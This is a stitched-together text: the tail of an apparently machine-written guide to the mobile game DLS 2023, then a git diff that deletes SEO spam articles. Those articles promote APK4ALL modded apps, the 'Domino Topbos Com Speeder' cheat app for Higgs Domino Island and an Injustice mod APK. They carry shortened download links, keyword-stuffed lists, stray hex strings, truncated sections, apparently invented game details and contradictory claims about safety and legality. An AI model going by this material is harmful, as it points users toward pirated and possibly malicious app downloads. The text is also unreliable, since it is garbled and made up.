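# Example query: the five fastest defenders with an OVR of at least 80.
defenders = [p for p in players if p["position"] == "DF" and int(p["ovr"]) >= 80]
fastest = sorted(defenders, key=lambda p: int(p["spe"]), reverse=True)[:5]

for p in fastest:
    print(p["name"], p["ovr"], p["spe"])
```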

      Use Agents and Scouts to discover new talent in the transfer market

      -

Another way to find the best players for your team is to use Agents and Scouts, two features that allow you to discover new talent in the transfer market. Agents are special cards that you can use to sign random players from a specific category, such as Gold, Silver, or Bronze. The higher the category, the higher the chance of getting a high-rated player. You can get Agents by completing achievements, participating in events, or purchasing them with coins or diamonds.

      -

Scouts are special cards that you can use to sign specific players from a certain region, league, club, or position. For example, you can use a Scout that targets Europe, Premier League, Manchester City, or Striker. The higher the specificity, the higher the cost of the Scout. You can get Scouts by playing matches, winning tournaments, or purchasing them with coins or diamonds.

      -

      Agents and Scouts are great ways to find new players for your team that match your preferences and budget. You can also use them to fill gaps in your squad or to replace players who are injured or out of form.

      -
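The "higher category, higher chance" idea behind Agents is easiest to picture as a weighted random draw. The probabilities below are invented for illustration; the real drop rates are not published.

```python
# Invented drop rates for illustration only; the real Agent odds are not public.
import random

AGENT_ODDS = {
    "Bronze": {"70-79": 0.80, "80-89": 0.19, "90+": 0.01},
    "Silver": {"70-79": 0.55, "80-89": 0.40, "90+": 0.05},
    "Gold":   {"70-79": 0.20, "80-89": 0.60, "90+": 0.20},
}

def draw_player(agent: str) -> str:
    """Return the rating bracket of a player signed with the given Agent."""
    brackets = list(AGENT_ODDS[agent])
    weights = list(AGENT_ODDS[agent].values())
    return random.choices(brackets, weights=weights, k=1)[0]

print(draw_player("Gold"))  # e.g. "80-89"
```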

      Use Coaches to improve your players' abilities and skills

      -

A third way to find the best players for your team is to use Coaches, a feature that allows you to improve your players' abilities and skills. Coaches are special cards that you can use to increase your players' OVR or specific attributes by a certain amount. For example, you can use a Coach that boosts your player's OVR by 5 points or his SHO by 10 points. You can get Coaches by completing achievements, participating in events, or purchasing them with coins or diamonds.

      -

      Coaches are useful to enhance your players' performance and potential. You can use them to upgrade your existing players or to train new players who have low ratings but high potential. You can also use them to balance your team's attributes and make them more versatile and adaptable.

      -

      How to play DLS 2023 and win matches

      -

      Learn the basics of the gameplay and controls

      -

To play DLS 2023 and win matches, you need to learn the basics of the gameplay and controls. The game has two modes: Classic and Casual. In Classic mode, you control your team using a virtual joystick and three buttons: A for passing and tackling, B for shooting and sliding, and C for crossing and switching players. In Casual mode, you control your team using simple taps and swipes on the screen. You can choose the mode that suits your preference and skill level.

      -

The game also has four difficulty levels: Easy, Medium, Hard, and Legendary. The higher the difficulty level, the more challenging and realistic the matches are. You can choose the difficulty level that matches your ability and goal. You can also adjust other settings such as match duration, camera angle, sound effects, and graphics quality.

      -

      Customize your team's kit, logo, and formation

      -

To play DLS 2023 and win matches, you need to customize your team's kit, logo, and formation. The game allows you to choose from a variety of kits and logos that are based on real-life soccer clubs, such as Barcelona, Liverpool, Juventus, PSG, and more. You can also import your own kit and logo from the internet or create your own using the in-game editor. You can also change the color and style of your kit and logo to suit your taste.

      -

      The game also allows you to choose from different formations that affect how your team plays and performs. You can choose from 4-4-2, 4-3-3, 3-5-2, 5-3-2, and more. You can also customize the positions and roles of your players, such as striker, winger, midfielder, defender, or goalkeeper. You can also assign different tactics and strategies to your team, such as attacking, defending, counter-attacking, or possession. You can also change the formation and tactics during the match to adapt to different situations.

      -

      Use Dream League Live mode to compete against other players online

      -

To play DLS 2023 and win matches, you need to use Dream League Live mode to compete against other players online. This is a mode that lets you play against other players from across the globe in real time. You can choose from different divisions and leagues that match your skill level and rank. You can also join or create clubs with other players and participate in club tournaments and events. You can also chat with other players and make friends or rivals.

      -

      Dream League Live mode is a fun and exciting way to test your skills and abilities against other players. You can also earn coins and diamonds by winning matches and climbing the leaderboards. You can also unlock exclusive rewards and achievements by completing challenges and milestones. You can also showcase your team's kit, logo, and formation to other players and impress them with your style.

      -

      Conclusion

      -

A summary of the main points

      -

      In conclusion, DLS 2023 is a soccer simulation game that lets you create and manage your own soccer club. You can use player ratings to build your dream team by finding the best players for your team, improving their abilities and skills, and customizing their kit, logo, and formation. You can also play DLS 2023 and win matches by learning the basics of the gameplay and controls, and competing against other players online in Dream League Live mode.

      -

Tips and tricks for DLS 2023 players

      -

      Here are some tips and tricks for DLS 2023 players that can help you improve your game and have more fun:

      -
        -
      • Use the DLS 23 Players Database to find out the ratings and stats of all the players in the game. You can also use it to compare different players and see who are the best in each category.
      • -
Use Agents and Scouts to discover new talent in the transfer market. You can get them by completing achievements, participating in events, or purchasing them with coins or diamonds.
      • -
Use Coaches to improve your players' abilities and skills. You can get them by completing achievements, participating in events, or purchasing them with coins or diamonds.
      • -
      • Customize your team's kit, logo, and formation to suit your preference and style. You can also import your own kit and logo from the internet or create your own using the in-game editor.
      • -
      • Choose the right formation and tactics for your team based on their strengths and weaknesses. You can also change them during the match to adapt to different situations.
      • -
      • Use Dream League Live mode to compete against other players online in real-time. You can earn coins and diamonds by winning matches and climbing the leaderboards. You can also unlock exclusive rewards and achievements by completing challenges and milestones.
      • -
      • Have fun and enjoy the game!
      • -
      -

      FAQs

      -

      What are the minimum requirements to play DLS 2023?

      -

      The minimum requirements to play DLS 2023 are as follows:

      -
        -
      • Android: OS version 5.0 or higher; RAM 1 GB or higher; free storage space 500 MB or higher
      • -
      • iOS: OS version 10.0 or higher; compatible with iPhone 5S or newer; free storage space 500 MB or higher
      • -
      -

      How can I get more coins and diamonds in DLS 2023?

      -

      You can get more coins and diamonds in DLS 2023 by doing the following:

      -
        -
      • Winning matches
      • Participating in events and tournaments
      • -
      • Completing achievements and milestones
      • -
      • Watching video ads
      • -
      • Purchasing them with real money
      • -
      -

      How can I import my own kit and logo in DLS 2023?

      -

      You can import your own kit and logo in DLS 2023 by following these steps:

      -
        -
1. Find or create your own kit and logo on the internet. Make sure they are in PNG format and have the right dimensions: 512 x 512 pixels for the kit and 256 x 256 pixels for the logo (a quick way to check this is sketched after this list).
      2. -
      3. Copy the URL of your kit and logo. You can use a URL shortener service to make it easier.
      4. -
      5. Open the game and go to My Club > Customize Team > Edit Kit or Edit Logo.
      6. -
      7. Tap on the Download button and paste the URL of your kit or logo.
      8. -
      9. Tap on Confirm and enjoy your new kit or logo.
      10. -
      -
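If you want to double-check your files before uploading them, a short script can confirm the format and dimensions. This is only an illustrative sketch, not part of DLS 2023 itself: it assumes you have Python with the Pillow library installed, and the file names are placeholders for your own kit and logo.

```python
from PIL import Image  # Pillow, assumed to be installed (pip install Pillow)

# Placeholder file names - replace them with your own kit and logo files
expected_sizes = {"my_kit.png": (512, 512), "my_logo.png": (256, 256)}

for path, expected in expected_sizes.items():
    with Image.open(path) as img:
        ok = img.format == "PNG" and img.size == expected
        print(f"{path}: format={img.format}, size={img.size}, ok={ok}")
```

If a file reports the wrong size, resize or re-export it before copying its URL into the game.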

      How can I unlock legendary players in DLS 2023?

      -

      You can unlock legendary players in DLS 2023 by doing the following:

      -
        -
      • Playing matches and earning XP points. The more XP points you have, the higher your level is. You can unlock legendary players at certain levels, such as level 10, 20, 30, and so on.
      • -
• Using Agents or Scouts that target legendary players. You can get them by completing achievements, participating in events, or purchasing them with coins or diamonds.
      • -
      • Purchasing them with real money. You can buy legendary players from the Shop using real money. However, this is not recommended as it can be expensive and unfair.
      • -
      -

      How can I update DLS 2023 to get the latest features and players?

      -

      You can update DLS 2023 to get the latest features and players by doing the following:

      -
        -
      • Checking for updates regularly on Google Play Store or App Store. You can also enable automatic updates to get them as soon as they are available.
      • -
      • Following the official social media accounts of DLS 2023 on Facebook, Twitter, Instagram, YouTube, and TikTok. You can also join the official Discord server to get the latest news and updates.
      • -
      • Giving feedback and suggestions to the developers of DLS 2023. You can contact them via email at support@ftgames.com or via the in-game Help & Support section.
      • -

      197e85843d
      -
      -
      \ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/Download APK4All The Trusted Source for Android APK Downloads.md b/spaces/congsaPfin/Manga-OCR/logs/Download APK4All The Trusted Source for Android APK Downloads.md deleted file mode 100644 index 159b953f2318fb4c4c90ed5b0bd1630d4e9a2d84..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/Download APK4All The Trusted Source for Android APK Downloads.md +++ /dev/null @@ -1,101 +0,0 @@ - -

      Download APK4ALL: A Guide for Android Users

      -

      If you are an Android user who loves to explore new apps and games on your device, you may have heard of APK4ALL. It is a website that offers thousands of modded and premium apps for Android devices.

      -

But what is APK4ALL and how can you use it to download and install amazing apps on your device? In this article, we will answer these questions and more. We will also discuss the benefits, risks, and alternatives of using APK4ALL. So, let's get started!

      -

      download apk4all


      Download Zip ::: https://urlca.com/2uO4Un



      -

      What is APK4ALL?

      -

      APK4ALL is a website that offers thousands of modded and premium apps for Android devices. Modded apps are apps that have been modified or hacked to provide users with extra features or functions that are not available in the original version. Premium apps are apps that require users to pay a fee or subscription to access them.

      -

      APK4ALL provides users with safe, virus-free, and updated APK files that can be downloaded and installed easily. APK files are the installation files for Android apps, similar to EXE files for Windows programs. APK4ALL has a variety of categories, such as games, tools, entertainment, education, and more. Users can browse the apps by category or search for the app they want.

      -

      Why use APK4ALL?

      -

      APK4ALL has many benefits for Android users who want to enjoy more features and functions on their devices. Here are some of the reasons why you should use APK4ALL:

      -
        -
      • Access apps that are not available on the Google Play Store: Some apps may be geo-restricted, adult, or removed from the Google Play Store for various reasons. APK4ALL allows users to access these apps without any hassle.
      • -
      • Download modded apps that have unlocked or unlimited features: Some apps may have limited features or functions that require users to pay or watch ads to unlock them. APK4ALL lets users download modded apps that have unlocked or unlimited features, such as coins, gems, lives, etc.
      • -
      • Save money by offering premium apps for free or at a discounted price: Some apps may be too expensive or require a subscription to use them. APK4ALL saves users money by offering premium apps for free or at a discounted price.
      • -
      -

      How to download APK4ALL?

      -

      Downloading APK4ALL is easy and fast. Users just need to follow these simple steps:

      -
        -
      1. Step 1: Go to the official website of APK4ALL () and browse the apps by category or search for the app you want.
      2. -
      3. Step 2: Click on the app you want to download and read the description, screenshots, and user reviews.
      4. -
      5. Step 3: Click on the download button and choose the version you want to download. You can also scan the QR code to download the app directly to your device.
      6. -
7. Step 4: After the download is complete, locate the APK file on your device and tap on it to install it. You may need to enable unknown sources in your settings to allow the installation (an alternative way to install the file from a computer is sketched after this list).
      8. -
      -
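As a side note, if you would rather push the downloaded APK from a computer instead of tapping the file on the phone, Android's standard adb tool can sideload it over USB. This is not an APK4ALL feature, just a generic sketch: it assumes adb is installed and on your PATH, USB debugging is enabled on the device, and the file name is a placeholder.

```python
import subprocess

apk_path = "downloaded_app.apk"  # placeholder path to the file you downloaded

# "adb install -r" installs the APK, replacing an existing copy if present
result = subprocess.run(["adb", "install", "-r", apk_path],
                        capture_output=True, text=True)
print(result.stdout or result.stderr)
```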

      What are the risks of using APK4ALL?

      -

      Although APK4ALL claims to be safe and reliable, there are some risks involved in using any third-party app store. Users should be aware of these risks and take precautions to avoid them. Here are some of the risks of using APK4ALL:

      -
        -
• Downloading fake or malicious apps that may harm your device or steal your data: To avoid this, users should always check the source, signature, and permissions of the apps they download from APK4ALL. Users can also use a virus scanner like VirusTotal () to check for any threats before installing the apps (a simple way to fingerprint a downloaded file is sketched after this list).
      • -
      • Violating the terms and conditions of the original app developers or publishers: Some apps may not allow modding or redistribution without their consent. Users may face legal consequences or lose access to their accounts if they use such apps from APK4ALL. Users should always respect the intellectual property rights of the app creators and use the apps at their own risk.
      • -
      -
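One concrete way to act on this advice is to fingerprint the downloaded file before installing it: compute its SHA-256 hash and compare it against the hash published by the developer, or search for the digest on a scanning service such as VirusTotal. The snippet below is a generic sketch; the file name is a placeholder.

```python
import hashlib

apk_path = "downloaded_app.apk"  # placeholder file name

sha256 = hashlib.sha256()
with open(apk_path, "rb") as f:
    # Read in chunks so large APKs do not need to fit in memory
    for chunk in iter(lambda: f.read(8192), b""):
        sha256.update(chunk)

# Compare this digest with one from a trusted source before installing
print(sha256.hexdigest())
```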

      What are some alternatives to APK4ALL?

      -

      If users are not satisfied with APK4ALL or want to try other options, there are some alternatives they can consider. Some of the popular ones are:

      -
        -
      • APKMirror (): A reputable site that offers original and verified APK files from Google Play and other sources. It does not host any modded or paid apps, but it has a large collection of old and new versions of apps. It also updates its apps regularly and supports automatic updates.
      • -
      • APKPure (): A similar site to APKMirror that also provides original and safe APK files from various sources. It does host some modded and paid apps, but it clearly labels them as such. It also has a user-friendly interface and an app store app that allows users to download and manage their apps easily.
      • -
      • HappyMod (): A site that specializes in modded apps for Android devices. It has a huge database of mods for various games and apps, such as Minecraft, Clash of Clans, Spotify, etc. It also has a community of users who rate and review the mods for quality and performance.
      • -
      -

      Conclusion

      -

      APK4ALL is a website that offers thousands of modded and premium apps for Android devices. It has many benefits for users who want to access more features and functions on their devices, but it also has some risks that users should be aware of and avoid. Users can also try some alternatives to APK4ALL if they are not satisfied with it or want to explore other options.

      -

      download apk4all mod apk
      -download apk4all premium apk
      -download apk4all pro apk
      -download apk4all cracked apk
      -download apk4all unlocked apk
      -download apk4all latest version
      -download apk4all for android
      -download apk4all for pc
      -download apk4all for ios
      -download apk4all for windows
      -download apk4all for mac
      -download apk4all for linux
      -download apk4all for firestick
      -download apk4all for smart tv
      -download apk4all for chromebook
      -download apk4all app store
      -download apk4all games
      -download apk4all movies
      -download apk4all music
      -download apk4all books
      -download apk4all comics
      -download apk4all wallpapers
      -download apk4all themes
      -download apk4all icons
      -download apk4all fonts
      -download apk4all ringtones
      -download apk4all stickers
      -download apk4all emoji
      -download apk4all filters
      -download apk4all effects
      -download apk4all tools
      -download apk4all utilities
      -download apk4all productivity
      -download apk4all education
      -download apk4all entertainment
      -download apk4all lifestyle
      -download apk4all health
      -download apk4all fitness
      -download apk4all sports
      -download apk4all news
      -download apk4all weather
      -download apk4all travel
      -download apk4all shopping
      -download apk4all finance
      -download apk4all business
      -download apk4all social media
      -download apk4all communication

      -

      We hope this article has helped you understand what APK4ALL is and how to use it to download and install amazing apps on your device. If you have any questions or feedback, please feel free to leave a comment below. Thank you for reading!

      -

      FAQs

      -
        -
      • Q: Is APK4ALL legal?
      • -
      • A: APK4ALL is not illegal in itself, but some of the apps it hosts may be illegal or infringe the rights of the original app developers or publishers. Users should always check the legality and legitimacy of the apps they download from APK4ALL and use them at their own risk.
      • -
      • Q: Is APK4ALL safe?
      • -
      • A: APK4ALL claims to be safe and reliable, but there are some risks involved in using any third-party app store. Users should always check the source, signature, and permissions of the apps they download from APK4ALL and use a virus scanner to check for any threats before installing the apps.
      • -
      • Q: How to update the apps from APK4ALL?
      • -
      • A: APK4ALL does not support automatic updates for the apps it hosts. Users need to manually check for updates on the website or use the app store app to see if there are any new versions available. Users can also enable notifications on the website or the app store app to get notified when there are updates.
      • -
      • Q: How to uninstall the apps from APK4ALL?
      • -
      • A: Users can uninstall the apps from APK4ALL the same way they uninstall any other app on their device. Users can go to their settings, find the app they want to uninstall, and tap on it to see the uninstall option. Users can also long-press on the app icon on their home screen and drag it to the trash bin.
      • -
      • Q: How to contact APK4ALL?
      • -
      • A: Users can contact APK4ALL by using the contact form on their website or by sending an email to support@apk4all.com. Users can also follow APK4ALL on their social media platforms, such as Facebook, Twitter, Instagram, etc.
      • -

      197e85843d
      -
      -
      \ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/Higgs Domino Topbos RP APK How to Win Gaple QiuQiu and Cangkulan with X8 Speeder.md b/spaces/congsaPfin/Manga-OCR/logs/Higgs Domino Topbos RP APK How to Win Gaple QiuQiu and Cangkulan with X8 Speeder.md deleted file mode 100644 index 21b8906624a224d84e2f8db03f10503c55e7f032..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/Higgs Domino Topbos RP APK How to Win Gaple QiuQiu and Cangkulan with X8 Speeder.md +++ /dev/null @@ -1,110 +0,0 @@ -
      -

      Download Domino Topbos Com Speeder: A Guide for Higgs Domino Island Players

      -

      If you are a fan of playing card games that can earn you real money, you may have heard of Higgs Domino Island, a popular game developed by Higgs Games. This game offers various types of card games such as Gaple, QiuQiu, Cangkulan, and Ludo, as well as attractive features such as chat rooms, emoticons, gifts, and lucky draws. However, playing this game can be challenging and time-consuming, especially if you want to win more games and get more rewards. That's why some players look for ways to enhance their gaming experience by using a modified version of the game called Domino Topbos Com Speeder.

      -

      But what is Domino Topbos Com Speeder exactly? How can you download it on your device? What are the benefits and risks of using it? In this article, we will answer these questions and provide you with a comprehensive guide on how to download domino topbos com speeder. Read on to find out more!

      -

      download domino topbos com speeder


DOWNLOAD https://urlca.com/2uOaIN



      -

      What is Domino Topbos Com Speeder?

      -

      Domino Topbos Com Speeder is a site that offers a modified version of Higgs Domino Island game. It has two versions: a free version and a premium version. The premium version has more features than the free version, but you can get it for free by using this site. The modified version has features that are similar to Higgs Domino RP APK, such as:

      -

      A site that offers a modified version of Higgs Domino Island game

      -
        -
      • Unlimited coins: You can get unlimited coins that you can use as in-game currency to play various games and buy items.
      • -
      • Unlimited RP: You can get unlimited RP (money) that you can use to exchange for real money or gift cards.
      • -
      • X8 Speeder: You can speed up the game and make it faster by using this feature.
      • -
      -

      A tool that allows players to get unlimited coins, RP, and speed up the game

      -

By using these features, you can play various games such as Gaple, QiuQiu, Cangkulan, and Ludo with ease. You can win more games and earn more rewards with unlimited coins and RP. You can also save time and enjoy the game more with the X8 Speeder feature.

      A risky and illegal app that may harm your device and account

      -

      However, before you decide to download domino topbos com speeder, you should be aware of the risks and consequences of using it. Domino Topbos Com Speeder is not an official app from Higgs Games, but a modified app from an unknown source. This means that it may contain malware and viruses that can harm your device and data. It may also violate the terms and conditions of Higgs Domino Island and get you banned or deleted from the game. Moreover, you may lose your account and progress if you use a fake login or a third-party account to access the game. And lastly, you may face legal consequences if you infringe the intellectual property rights of Higgs Games by using their game without their permission.

      -

      How to Download Domino Topbos Com Speeder?

      -

      If you still want to download domino topbos com speeder despite the risks, you can follow these steps:

      -

      Visit the official website of Domino Topbos Com

      -

      The first step is to visit the official website of Domino Topbos Com, which is https://dominotopbos.com/. This is the only site that provides the download link for the app. Do not trust any other sites that claim to offer the same app, as they may be scams or phishing sites.

      -

      Choose the version of the app that suits your needs

      -

      The next step is to choose the version of the app that suits your needs. There are two versions available: a free version and a premium version. The free version has limited features, such as unlimited coins and RP, but no X8 Speeder. The premium version has all the features, including X8 Speeder, but you have to pay for it. However, you can get it for free by using this site. To do so, you have to complete some tasks, such as watching videos, filling surveys, or downloading apps.

      -

      download domino topbos com speeder apk
      -download domino topbos com speeder mod
      -download domino topbos com speeder terbaru
      -download domino topbos com speeder unlimited rp
      -download domino topbos com speeder x8
      -download domino topbos com speeder android
      -download domino topbos com speeder gratis
      -download domino topbos com speeder versi lama
      -download domino topbos com speeder no root
      -download domino topbos com speeder tanpa password
      -cara download domino topbos com speeder
      -link download domino topbos com speeder
      -situs download domino topbos com speeder
      -tutorial download domino topbos com speeder
      -review download domino topbos com speeder
      -download higgs domino topbos rp x8 speeder apk
      -download higgs domino topbos rp x8 speeder mod apk
      -download higgs domino topbos rp x8 speeder terbaru 2023
      -download higgs domino topbos rp x8 speeder unlimited coin
      -download higgs domino topbos rp x8 speeder gratis
      -download higgs domino island mod apk topbos com x8 speeder
      -download higgs domino island mod apk topbos com x8 speeder terbaru 2023
      -download higgs domino island mod apk topbos com x8 speeder unlimited coin
      -download higgs domino island mod apk topbos com x8 speeder gratis
      -download higgs domino island mod apk topbos com x8 speeder no root
      -cara download higgs domino island mod apk topbos com x8 speeder
      -link download higgs domino island mod apk topbos com x8 speeder
      -situs download higgs domino island mod apk topbos com x8 speeder
      -tutorial download higgs domino island mod apk topbos com x8 speeder
      -review download higgs domino island mod apk topbos com x8 speeder
      -game kartu penghasil uang dengan domino topbos com speeder
      -game kartu penghasil uang dengan domino topbos com speeder apk
      -game kartu penghasil uang dengan domino topbos com speeder mod apk
      -game kartu penghasil uang dengan domino topbos com speeder terbaru 2023
      -game kartu penghasil uang dengan domino topbos com speeder unlimited coin
      -game kartu penghasil uang dengan domino topbos com speeder gratis
      -game kartu penghasil uang dengan higgs domino rp x8 speeder apk terbaru 2023 dari jalantikus.com[^1^]
      -game kartu penghasil uang dengan higgs domino rp x8 speeder apk terbaru 2023 dari jalantikus.com gratis[^1^]
      -game kartu penghasil uang dengan higgs domino rp x8 speeder apk terbaru 2023 dari jalantikus.com unlimited coin[^1^]
      -game kartu penghasil uang dengan higgs domino rp x8 speeder apk terbaru 2023 dari jalantikus.com no root[^1^]
      -cara bermain game kartu penghasil uang dengan higgs domino rp x8 speeder apk terbaru 2023 dari jalantikus.com[^1^]
      -link bermain game kartu penghasil uang dengan higgs domino rp x8 speeder apk terbaru 2023 dari jalantikus.com[^1^]
      -situs bermain game kartu penghasil uang dengan higgs domino rp x8 speeder apk terbaru 2023 dari jalantikus.com[^1^]
      -tutorial bermain game kartu penghasil uang dengan higgs domino rp x8 speeder apk terbaru 2023 dari jalantikus.com[^1^]
      -review bermain game kartu penghasil uang dengan higgs domino rp x8 speeder apk terbaru 2023 dari jalantikus.com[^1^]

      -

      Click on the download button and wait for the file to be downloaded

      -

      The third step is to click on the download button and wait for the file to be downloaded. The file size is about 70 MB, so it may take some time depending on your internet speed. Make sure you have enough storage space on your device before downloading the file.

      -

      Install the app on your device and grant the required permissions

      -

      The fourth step is to install the app on your device and grant the required permissions. To do so, you have to enable the installation of apps from unknown sources in your device settings. Then, locate the downloaded file in your file manager and tap on it to start the installation process. Follow the instructions on the screen and grant the permissions that the app asks for, such as access to your storage, camera, microphone, etc.

      -

      Open the app and enjoy the game with enhanced features

      -

      The final step is to open the app and enjoy the game with enhanced features. You can log in with your existing account or create a new one. You can also choose whether to use X8 Speeder or not by toggling it on or off in the app settings. You can then play various games such as Gaple, QiuQiu, Cangkulan, and Ludo with ease. You can also win more games and earn more rewards with unlimited coins and RP.

      What are the Benefits of Domino Topbos Com Speeder?

      -

      Some players may wonder why they should download domino topbos com speeder instead of playing the original game. Well, there are some benefits that you can get from using this app, such as:

      -

      You can play various games such as Gaple, QiuQiu, Cangkulan, and Ludo with ease

      -

      One of the benefits of domino topbos com speeder is that you can play various games such as Gaple, QiuQiu, Cangkulan, and Ludo with ease. These games are fun and challenging, but they can also be frustrating and time-consuming if you don't have enough coins or skills. With domino topbos com speeder, you can play these games without worrying about running out of coins or losing to other players. You can also learn the rules and strategies of these games by playing them more often.

      -

      You can win more games and earn more rewards with unlimited coins and RP

      -

      Another benefit of domino topbos com speeder is that you can win more games and earn more rewards with unlimited coins and RP. Coins and RP are the main currencies in Higgs Domino Island, and you need them to play games, buy items, and exchange for real money or gift cards. However, earning coins and RP can be hard and slow, especially if you don't win many games or participate in lucky draws. With domino topbos com speeder, you can get unlimited coins and RP that you can use as you wish. You can play more games, buy more items, and exchange for more rewards.

      -

      You can speed up the game and save time with X8 Speeder feature

      -

      A third benefit of domino topbos com speeder is that you can speed up the game and save time with X8 Speeder feature. X8 Speeder is a feature that allows you to make the game faster by increasing the speed of the animations and movements. This can help you save time and enjoy the game more, especially if you are busy or impatient. You can also use this feature to complete tasks or missions faster and get more bonuses.

      -

      You can experience a more modern and smooth gameplay with improved graphics and performance

      -

      A fourth benefit of domino topbos com speeder is that you can experience a more modern and smooth gameplay with improved graphics and performance. The original game may have some issues with graphics quality, loading speed, or compatibility with some devices. With domino topbos com speeder, you can enjoy a more enhanced version of the game that has better graphics quality, faster loading speed, and wider compatibility with different devices. You can also enjoy a more user-friendly interface and design that makes the game easier to navigate and play.

      What are the Risks of Domino Topbos Com Speeder?

      -

      However, before you download domino topbos com speeder, you should also be aware of the risks and consequences of using it. Domino Topbos Com Speeder is not an official app from Higgs Games, but a modified app from an unknown source. This means that it may have some drawbacks and dangers that you should consider, such as:

      -

      You may expose your device to malware and viruses that can damage your data and system

      -

      One of the risks of domino topbos com speeder is that you may expose your device to malware and viruses that can damage your data and system. Since the app is not from a trusted source, it may contain malicious code or programs that can infect your device and compromise your security. You may lose your personal information, such as passwords, bank accounts, or contacts, or you may experience performance issues, such as slow speed, crashes, or errors. You may also have to pay for repairing or replacing your device if it gets damaged beyond repair.

      -

      You may violate the terms and conditions of Higgs Domino Island and get banned or deleted from the game

      -

      Another risk of domino topbos com speeder is that you may violate the terms and conditions of Higgs Domino Island and get banned or deleted from the game. Higgs Games has the right to monitor and regulate the use of their game and to take action against any users who break their rules or cheat their system. By using domino topbos com speeder, you are modifying the game without their permission and gaining an unfair advantage over other players. This can be considered as cheating or hacking, which can result in your account being suspended or terminated. You may lose your access to the game and all your progress and rewards.

      -

      You may lose your account and progress if you use a fake login or a third-party account

      -

      A third risk of domino topbos com speeder is that you may lose your account and progress if you use a fake login or a third-party account. Domino Topbos Com Speeder requires you to log in with your existing account or create a new one to access the game. However, some users may use a fake login or a third-party account, such as Facebook or Google, to avoid detection or verification. This can be risky, as these accounts may not be secure or compatible with the app. You may lose your account and progress if these accounts get hacked, deleted, or blocked by the app.

      -

      You may face legal consequences if you infringe the intellectual property rights of Higgs Games

      -

      A fourth risk of domino topbos com speeder is that you may face legal consequences if you infringe the intellectual property rights of Higgs Games. Higgs Games owns the rights to their game and its content, such as graphics, sounds, characters, etc. By using domino topbos com speeder, you are copying and modifying their game without their authorization and consent. This can be considered as piracy or theft, which can result in legal action against you. You may have to pay fines, damages, or face criminal charges for violating their rights.

      -

      Conclusion

      -

      Domino Topbos Com Speeder is a site that offers a modified version of Higgs Domino Island game. It has features that allow players to get unlimited coins, RP, and speed up the game. It also has improved graphics and performance that make the game more modern and smooth. However, it also has risks and consequences that players should consider before downloading it. It may expose their device to malware and viruses, violate the terms and conditions of Higgs Domino Island, lose their account and progress, or face legal consequences.

      -

      Therefore, we do not recommend using domino topbos com speeder for playing Higgs Domino Island. It is better to play the original game from Higgs Games and enjoy it with its official features and updates. You can also play the game more safely and legally by following their rules and respecting their rights.

      -

      FAQs

      -

      Here are some frequently asked questions about domino topbos com speeder:

      -
        -
      1. Is domino topbos com speeder safe?
      2. -

        No, domino topbos com speeder is not safe. It is a modified app from an unknown source that may contain malware and viruses that can harm your device and data. It may also violate the terms and conditions of Higgs Domino Island and get you banned or deleted from the game.

        -
      3. Is domino topbos com speeder free?
      4. -

        Yes, domino topbos com speeder is free. You can download it from their official website without paying anything. However, you have to complete some tasks to get the premium version of the app, such as watching videos, filling surveys, or downloading apps.

        -
      5. Is domino topbos com speeder legal?
      6. -

        No, domino topbos com speeder is not legal. It is a modified app that infringes the intellectual property rights of Higgs Games by copying and modifying their game without their permission and consent. It may also violate the laws and regulations of your country or region by engaging in piracy or theft.

        -
      7. Can I use domino topbos com speeder with my existing account?
      8. -

        Yes, you can use domino topbos com speeder with your existing account. However, this is not recommended, as you may risk losing your account and progress if you get detected or banned by Higgs Games. You may also lose your account and progress if you use a fake login or a third-party account that is not secure or compatible with the app.

        -
      9. Can I exchange my coins and RP for real money or gift cards?
      10. -

        Yes, you can exchange your coins and RP for real money or gift cards. However, this is not recommended, as you may risk getting scammed or cheated by the app or the site. You may also face legal consequences if you use fake or stolen money or gift cards.

        -

      197e85843d
      -
      -
      \ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/Injustice Gods Among Us MOD APK - The Most Epic DC Battle Simulator.md b/spaces/congsaPfin/Manga-OCR/logs/Injustice Gods Among Us MOD APK - The Most Epic DC Battle Simulator.md deleted file mode 100644 index 9c2002015bf61f6081b5bbb791491c1e3f08f07e..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/Injustice Gods Among Us MOD APK - The Most Epic DC Battle Simulator.md +++ /dev/null @@ -1,69 +0,0 @@ -
      -

      Injustice: Gods Among Us Mod APK Latest Version

      -

      If you are a fan of DC comics and fighting games, you will love Injustice: Gods Among Us. This is a game that lets you create your own team of superheroes and villains, and battle against other players or the AI in epic 3v3 fights. You can also enjoy a captivating story mode that explores an alternate reality where Superman becomes a tyrant after losing Lois Lane. In this article, we will show you how to download and install Injustice: Gods Among Us Mod APK, which is a modified version of the game that gives you access to unlimited resources, all characters unlocked, god mode, one-hit kill, no ads, and more. Read on to find out more about this amazing game and how to get the most out of it.

      -

      What is Injustice: Gods Among Us?

      -

      Injustice: Gods Among Us is a fighting game developed by NetherRealm Studios, the same creators of Mortal Kombat. It was released in 2013 for iOS, Android, PlayStation 3, Xbox 360, Wii U, and PC. The game features characters from the DC universe, such as Batman, Superman, Wonder Woman, Joker, Harley Quinn, Flash, Green Lantern, Aquaman, Cyborg, Catwoman, Bane, Lex Luthor, and many more. You can choose your favorite heroes and villains, customize them with gear and abilities, and fight in various arenas inspired by iconic locations like Gotham City, Metropolis, Arkham Asylum, Atlantis, Themyscira, etc.

      -

      injustice gods among us mod apk latest version


DOWNLOAD https://urlca.com/2uO5nI



      -

      The game has several modes to keep you entertained. You can play the story mode, which follows the events of the comic book series of the same name. You can also play the challenge mode, which offers different scenarios and objectives for each character. You can also play the online mode, which allows you to compete with other players around the world in ranked or unranked matches. You can also play the offline mode, which lets you practice your skills or have fun with your friends in local multiplayer.

      -

      Why use Injustice: Gods Among Us Mod APK?

      -

      While Injustice: Gods Among Us is a great game, it also has some drawbacks. For example, it can be quite difficult to earn enough coins and gems to unlock new characters, gear, cards, and upgrades. It can also be frustrating to face opponents who have better stats and abilities than you. It can also be annoying to watch ads every time you want to play or claim rewards. And it can also be risky to root your device or use cheats that might get you banned or harm your device.

      -

That's why we recommend using Injustice: Gods Among Us Mod APK, which lets you enjoy the game to the fullest. And the best part is that you don't need to root your device or use any cheats that might get you banned or harm your device. Injustice: Gods Among Us Mod APK works on any Android device without any issues. You can play safely and securely without any risks.

      -

      Tips and tricks for playing Injustice: Gods Among Us Mod APK

      -

